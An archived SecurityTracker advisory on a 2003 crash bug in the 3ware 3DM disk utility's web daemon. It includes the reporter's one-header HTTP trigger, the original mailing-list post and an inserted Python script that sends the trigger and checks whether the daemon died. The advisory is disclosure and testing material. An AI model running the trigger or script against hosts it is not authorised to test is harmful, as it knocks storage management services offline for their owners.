SecurityTracker.com

SecurityTracker Archives

Category:   Application (Generic)  >   3DM Disk Management Utility
Vendors:   3ware
3ware 3DM Disk Management Utility Web Daemon Bugs Let Remote Users Crash the Software
SecurityTracker Alert ID:  1006024
SecurityTracker URL:  http://securitytracker.com/id/1006024
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 30 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.13.00.019; Possibly others
Description:   A denial of service vulnerability was reported in the web daemon of the 3ware 3DM Disk Management Utility. A remote user can cause the daemon to terminate.

It is reported that a remote user can connect to the 3DM web server on TCP port 1080 and send a request whose Accept-Charset header carries an unexpected value, causing the web server daemon to terminate immediately. The reporter's minimal reproducible test case, which works against both the Linux and the Windows builds, is:

GET / HTTP/1.1
Host: foo
Accept-Charset: bar

It is also reported that the server refuses to accept a login if the client sends any cookies at all. This causes operational difficulties at sites that set domain-wide cookies (for example a site-wide .domain.edu cookie), because browsers then attach a cookie to every request to the 3DM server.

A second reporter (Jason Giglio) confirmed that running a Nessus scan against version 1.13.00.019 also crashes the daemon, which is consistent with the original report that a Nessus scan was the first known trigger.
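The request quoted above can be turned into a repeatable check. The script below is an added example; it is not code from the advisory, from the reporter, or from 3ware. It sends the benign form of the request, then the Accept-Charset trigger, then the benign request again, and classifies what the daemon did each time: a crashed daemon shows up as a connection closed with no reply, followed by a refused connection once the listener is gone. Because 3DM is not available here, a constructed stand-in listener that mimics the reported behaviour is included so the script runs offline; `crash_check` is the part you would point at a real host on port 1080. The function names, the `extra_headers` parameter and the stand-in's behaviour are assumptions made for the example.

```python
"""Probe for the 3DM port-1080 crash described in the advisory.

Added example, not code from the advisory or from 3ware.  The stand-in
daemon below is constructed for offline use and only mimics the reported
behaviour (answers normal requests, dies on Accept-Charset).
"""
import socket
import sys
import threading
import time

THREE_DM_PORT = 1080  # port of the 3DM web daemon named in the advisory


def build_request(host_header="foo", extra_headers=None):
    """Build the raw HTTP/1.1 request from the advisory.

    extra_headers (assumed helper parameter) lets the same builder emit the
    Accept-Charset trigger or, for the login problem, a Cookie header.
    """
    lines = ["GET / HTTP/1.1", f"Host: {host_header}"]
    for name, value in (extra_headers or {}).items():
        lines.append(f"{name}: {value}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


TRIGGER = build_request("foo", {"Accept-Charset": "bar"})  # exact PoC from the advisory
BENIGN = build_request("foo")                               # same request, no trigger header


def probe(host, port, payload, timeout=5.0):
    """Send payload and classify the outcome:
      'responded'   - the daemon sent at least one byte back
      'no_response' - connection closed or reset without a reply (what a
                      crashed process looks like from the client side)
      'refused'     - nothing is listening any more
      'timeout'     - no answer within the timeout
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(payload)
            try:
                data = sock.recv(4096)
            except (ConnectionResetError, BrokenPipeError):
                return "no_response"
            except socket.timeout:
                return "timeout"
            return "responded" if data else "no_response"
    except ConnectionRefusedError:
        return "refused"
    except socket.timeout:
        return "timeout"


def crash_check(host, port, timeout=5.0, settle=2.0):
    """Benign, trigger, benign again.  Returns the three outcomes in order;
    ['responded', 'no_response', 'refused'] means the daemon died."""
    results = [probe(host, port, BENIGN, timeout), probe(host, port, TRIGGER, timeout)]
    time.sleep(settle)  # give a dying daemon time to release the port
    results.append(probe(host, port, BENIGN, timeout))
    return results


class FakeDaemon(threading.Thread):
    """Constructed stand-in for the vulnerable daemon (not 3DM itself)."""

    def __init__(self):
        super().__init__(daemon=True)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind(("127.0.0.1", 0))  # ephemeral port, not 1080, so it runs anywhere
        self.listener.listen(1)
        self.port = self.listener.getsockname()[1]

    def run(self):
        while True:
            conn, _ = self.listener.accept()
            with conn:
                request = conn.recv(4096)
                if b"Accept-Charset:" in request:
                    break  # unhandled exception path: process exits, no reply sent
                conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
        self.listener.close()  # listener disappears with the process


def run_against_fake_daemon():
    """Offline demonstration: returns the three probe outcomes."""
    daemon = FakeDaemon()
    daemon.start()
    return crash_check("127.0.0.1", daemon.port, timeout=5.0, settle=1.0)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(crash_check(sys.argv[1], THREE_DM_PORT))  # real target: this takes the daemon down
    else:
        print(run_against_fake_daemon())
```

Run it only against a system you are allowed to take down, since a positive result means the daemon is gone. The same builder emits a `Cookie` header (`build_request("foo", {"Cookie": "a=b"})`) if you want to reproduce the login refusal against a real 3DM instance; the stand-in does not model that behaviour.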

Impact:   A remote user can cause the 3DM web server process to crash, and any client that presents cookies cannot log in.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.3ware.com/products/raid_management.asp
Cause:   Exception handling error
Underlying OS:  Linux (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  3Ware 3DM denial of service attack


I've reported this to 3ware at least twice, and never received any
response. Previously I didn't have a test case other than "run a nessus
scan against the host". I've narrowed it down to a reproducible minimum
test case now.

If you connect to 3dm port 1080 on either Linux or Windows and send:

GET / HTTP/1.1
Host: foo
Accept-Charset: bar

the 3dm server will terminate immediately.


Other 3dm problems: it flips out and refuses to accept a login if you
send ANY cookies. This screws you over if you have a site-wide
.domain.edu cookie, for example.

-- Nathan

------------------------------------------------------------
Nathan Neulinger                       EMail:  nneul@umr.edu
University of Missouri - Rolla         Phone: (573) 341-4841
Computing Services                       Fax: (573) 341-4216

Copyright 2021, SecurityGlobal.net LLC